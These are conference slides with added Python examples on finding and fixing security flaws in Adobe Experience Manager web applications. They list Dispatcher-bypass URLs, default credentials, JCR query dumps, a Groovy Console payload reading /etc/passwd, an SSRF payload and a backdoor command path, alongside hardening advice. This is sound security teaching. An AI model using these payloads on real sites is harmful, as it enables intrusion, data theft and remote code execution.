
Securing AEM webapps by hacking them

Mikhail Egorov

September 03, 2019


Transcript

  1. APACHE SLING & FRIENDS TECH MEETUP
    2 - 4 SEPTEMBER 2019
    Securing AEM webapps by hacking them
    Mikhail Egorov @0ang3el, Security researcher & Bug hunter.

  2. Intro

  3. whoami
    • Security researcher & full-time bug hunter
    • https://bugcrowd.com/0ang3el
    • https://hackerone.com/0ang3el
    • Conference speaker
    • https://www.slideshare.net/0ang3el
    • https://speakerdeck.com/0ang3el

  4. AEM & Bug Bounties

  5. My research on AEM security
    PHDays 2015
    Hacktivity 2018
    LevelUp 2019
    https://www.slideshare.net/0ang3el

  6. Fellow hackers
    @darkarnium, 2016
    @fransrosen, 2018
    @JonathanBoumanium, 2018
    https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c
    https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem
    http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  7. Common AEM deployment
    Diagram: the client interacts with the Publish server via AEM Dispatcher (labels: 4503/tcp, 4502/tcp, 443/tcp, ?)
    Main blocks:
    • Author AEM instance
    • Publish AEM instance
    • AEM dispatcher (~WAF)

  8. Sources of vulnerabilities
    • AEM misconfiguration
    • AEM code (CVEs)
    • 3rd-party plugins
    • Your code

  9. Vulnerabilities due to misconfiguration

  10. AEM dispatcher bypass – CVE-2016-0957
    • Blocked by Dispatcher
      /bin/querybuilder.json
    • However passed to publish instance
      /bin/querybuilder.json/a.css
      /bin/querybuilder.json/a.ico
      /bin/querybuilder.json?a.html
      /bin/querybuilder.json;%0aa.css

  11. AEM dispatcher bypass – Sling “features”
    • When a Sling Servlet is registered with sling.servlet.paths, other properties are ignored (e.g. sling.servlet.extensions)
    • Bypassing extension check
      /bin/querybuilder.json.css
      /bin/querybuilder.feed.ico

  12. AEM dispatcher bypass – Sling “features”
    • When a Sling Servlet is registered with sling.servlet.resourceTypes
    • Bypassing path check
      Create a node with the proper sling:resourceType under /content/usergenerated/etc/commerce/smartlists

  13. AEM dispatcher security tips
    • Don’t use rules like
      /0041 { /type "allow" /url "*.css" } # This is bad
    • Better use
      /0041 { /type "allow" /extension 'css' }

  14. AEM dispatcher security tips
    • Explicit deny rules for dangerous endpoints
      /0090 { /type "deny" /path "/libs/*" }
      /0091 { /type "deny" /path "/bin/querybuilder*" }
    • Place explicit deny rules at the end of the policy
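
The rules from slides 13 and 14 modelled in Python, as an added example that is not part of the deck or of Dispatcher itself: a simplified /filter evaluator (request split at the first dot into path, selectors, extension and suffix; last matching rule wins, implicit deny) run over the bypass URLs from slides 10 and 11. It shows why the /url "*.css" allow rule is bypassable, why /extension 'css' alone still lets /bin/querybuilder.json.css through, and why the explicit deny rules must come last.

```python
"""Simplified model of AEM Dispatcher /filter evaluation (added example, not
Dispatcher's code). Requests are split the Sling way into path, selectors,
extension and suffix, cutting at the first dot (an assumption that holds for
the slide URLs); rules apply in order and the last match decides."""
from fnmatch import fnmatchcase
from urllib.parse import urlsplit

def decompose(url):
    """Return the request parts a /filter rule can match (/url, /path, /extension, ...)."""
    split = urlsplit(url)
    p = split.path
    parts = {"url": p + ("?" + split.query if split.query else ""),
             "path": p, "selectors": [], "extension": "", "suffix": ""}
    dot = p.find(".")
    if dot != -1:
        sel_ext, slash, suffix = p[dot + 1:].partition("/")
        names = sel_ext.split(".")
        parts.update(path=p[:dot], selectors=names[:-1],
                     extension=names[-1], suffix=slash + suffix)
    return parts

def evaluate(rules, url, method="GET"):
    """Apply rules in order; the last matching rule decides (implicit deny)."""
    parts = decompose(url)
    parts["method"] = method
    decision = "deny"
    for rule in rules:
        if all(fnmatchcase(parts[k], glob) for k, glob in rule["match"].items()):
            decision = rule["type"]
    return decision

# Rule sets from the slides; the leading deny-all is the customary first rule.
WEAK = [
    {"type": "deny", "match": {"url": "*"}},
    {"type": "allow", "match": {"url": "*.css"}},               # /0041 (bad)
]
HARDENED = [
    {"type": "deny", "match": {"url": "*"}},
    {"type": "allow", "match": {"extension": "css"}},          # /0041 (better)
    {"type": "deny", "match": {"path": "/libs/*"}},             # /0090, at the end
    {"type": "deny", "match": {"path": "/bin/querybuilder*"}},  # /0091, at the end
]
BYPASSES = ["/bin/querybuilder.json/a.css", "/bin/querybuilder.json.css"]

if __name__ == "__main__":
    for url in BYPASSES + ["/content/site/styles.css"]:
        print(f"{url:32} weak={evaluate(WEAK, url):5} hardened={evaluate(HARDENED, url)}")
```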

  15. Default credentials
    • admin/admin
    • author/author
    • Geometrixx users
      grios:password
      [email protected]:jdoe
      …

  16. Default credentials
    == base64(admin:admin)

  17. Weak passwords / Credentials bruteforcing
    • Properties jcr:createdBy, cq:lastModifiedBy, jcr:lastModifiedBy contain usernames
    • Many ways to bruteforce
      LoginStatusServlet
      GetLoggedInUser servlet
      CurrentUserServlet
      …

  18. Weak permissions for JCR
    • Many ways to access JCR
      DefaultGetServlet
      QueryBuilderJsonServlet
      QueryBuilderFeedServlet
      GQLSearchServlet
      CRXDE Lite
      …

  19. Weak permissions for JCR
    • Anonymous user has jcr:write permission for /content/usergenerated/etc/commerce/smartlists

  20. /apps//config.author.tidy.1..json/a.ico

  21. Weak permissions for JCR
    type=nt:file&nodename=*.zip

  22. Weak permissions for JCR
    path=/home&p.hits=full&p.limit=-1

  23. Vulnerabilities due to 3rd-party components

  24. Groovy Console
    • Exposes a servlet at /bin/groovyconsole/post.servlet without authentication by default
    https://github.com/icfnext/aem-groovy-console

  25. script=def+proc+%3d+”cat+/etc/passwd”.execute()%0d%0aprintln+proc.text

  26. ACS AEM Tools
    • Exposes Fiddle with the ability to execute JSP scripts at /etc/acs-tools/aem-fiddle/_jcr_content.run.html
    • May not require authentication

  28. AEM vulnerabilities

  29. CVE-2018-12809 (SSRF*)
    • ReportingServicesProxyServlet (cq-content-insight bundle)
    @SlingServlet(
        generateComponent = true,
        metatype = true,
        resourceTypes = {"cq/contentinsight/proxy"},
        extensions = {"json"},
        selectors = {"reportingservices"},
        methods = {"GET"},
        label = "Reporting Services API proxy servlet",
        description = "Proxy servlet for Reporting Services API"
    )
    public class ReportingServicesProxyServlet extends SlingSafeMethodsServlet {
        private static final String DEFAULT_API_OMNITURE_URL = ".*/api[0-9]*.omniture.com/.*";
        ...
    }
    *SSRF - Server Side Request Forgery

  30. CVE-2018-12809 (SSRF*)
    • Paths to invoke servlet
      /libs/cq/contentinsight/content/proxy.reportingservices.json
      /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet
    • Vulnerable parameter url
      url=http://anyurl%23/api1.omniture.com/a
    *SSRF - Server Side Request Forgery
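
The allowlist check behind slides 29 and 30, as an added example in Python rather than the servlet's Java (not Adobe's code): the DEFAULT_API_OMNITURE_URL pattern from slide 29 applied to the raw url parameter, beside a host-based check that parses the URL before comparing. The sample URLs are constructed, and the slide's %23 payload appears decoded as '#'.

```python
"""Why the CVE-2018-12809 allowlist fails and how a host-based check holds.
Added example, not Adobe's code: the pattern is the slide's
DEFAULT_API_OMNITURE_URL; the two checks and the sample URLs are constructed."""
import re
from urllib.parse import urlsplit

DEFAULT_API_OMNITURE_URL = re.compile(r".*/api[0-9]*.omniture.com/.*")

def allowed_by_regex(url):
    """Vulnerable shape: a regex over the raw string. Its dots are unescaped and
    the leading .* lets '/api1.omniture.com/' anywhere in the string satisfy it
    (fragment, query string, lookalike host)."""
    return DEFAULT_API_OMNITURE_URL.match(url) is not None

def allowed_by_host(url):
    """Defensive shape: parse first, then compare the host the proxy would really
    connect to against an anchored, escaped pattern; require https, no userinfo."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme != "https" or parts.username or parts.password:
        return False
    host = (parts.hostname or "").lower()
    return re.fullmatch(r"api[0-9]*\.omniture\.com", host) is not None

# Constructed samples: (url, should it be allowed?)
SAMPLES = [
    ("https://api1.omniture.com/admin/1.4/rest/", True),
    ("http://anyurl#/api1.omniture.com/a", False),        # slide payload, %23 decoded
    ("http://anyurl/?next=/api1.omniture.com/a", False),  # same trick via the query
    ("https://api1xomniture.com/a", False),               # unescaped '.' lookalike
]

def compare():
    """Map each sample URL to (regex verdict, host verdict, expected verdict)."""
    return {u: (allowed_by_regex(u), allowed_by_host(u), ok) for u, ok in SAMPLES}

if __name__ == "__main__":
    for url, (rx, host, ok) in compare().items():
        print(f"{url:45} regex={rx!s:5} host={host!s:5} expected={ok}")
```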

  34. ExternalJobPostServlet deser / CVE?
    • Affects AEM 5.5 / AEM 5.6
    @Service
    @Properties(value = {
        @Property(name = "sling.servlet.extensions", value = "json"),
        @Property(name = "sling.servlet.paths", value = "/libs/dam/cloud/proxy"),
        @Property(name = "sling.servlet.methods", value = { "POST", "GET", "HEAD" })
    })
    public class ExternalJobPostServlet extends SlingAllMethodsServlet {
        ...
    }

  35. ExternalJobPostServlet deser / CVE?
    • Parameter file accepts a Java serialized stream and passes it to ObjectInputStream.readObject()
    • Hard to exploit in an OSGi environment

  38. Automation

  39. AEM RCE bundle
    • Allows getting RCE* when having access to the Felix Console
    • https://github.com/0ang3el/aem-rce-bundle.git
    * RCE – Remote Code Execution

  40. AEM RCE bundle
    • Path - /bin/backdoor.html?cmd=ifconfig

  41. AEM Hacker
    • Scripts to check security of AEM application
    • aem_hacker.py, aem_discoverer.py, aem_enum.py, aem_ssrf2rce.py, aem_server.py, response.bin, aem-rce-sling-script.sh
    • https://github.com/0ang3el/aem-hacker.git

  42. DEMO

  43. Takeaways

  44. Takeaways
    • Vulnerabilities can occur at different levels
    • Install security updates
    • Defense in depth
    • Check the security of your AEM application
    • Pentest / Bug bounty

  45. Thank you
    @0ang3el